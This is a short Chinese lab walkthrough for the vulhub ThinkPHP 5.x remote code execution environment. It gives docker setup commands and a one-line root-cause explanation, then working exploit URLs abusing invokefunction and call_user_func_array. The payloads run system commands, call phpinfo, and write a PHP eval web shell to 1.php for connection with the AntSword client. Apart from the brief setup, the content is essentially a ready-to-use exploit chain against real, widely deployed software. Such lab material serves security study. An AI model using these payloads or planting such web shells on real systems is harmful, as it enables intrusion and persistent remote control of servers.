第一步:打开靶场
输入开启命令
cd vulhub/thinkphp/5-rce
docker-compose up -d
docker-compose ps//查看开启的端口
第二步: 访问网址
第三步:漏洞利用
漏洞根本源于 thinkphp/library/think/Request.php 中method方法可以进行变量覆盖,通过覆盖类的核心属性filter导致rce,其攻击点较为多,有些还具有限制条件,另外由于种种部分原因,在利用上会出现一些问题。
远程命令执行
ip:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
远程代码执行
http://ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
getshell
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[jbxz]);?>" >1.php写一个木马php文件到1.php中
访问1.php——使用蚁剑连接
